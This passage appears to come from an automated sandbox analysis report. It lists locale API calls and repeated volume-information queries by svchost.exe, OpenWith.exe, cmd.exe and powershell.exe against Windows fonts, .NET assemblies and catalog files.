Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoW, 46_2_00007FFA41873744
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW, 46_2_00007FFA41881900
Source: C:\Windows\System32\svchost.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID, 46_2_00007FFA41873CA4
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 46_2_00007FFA41881D34
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 46_2_00007FFA41881F2C
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
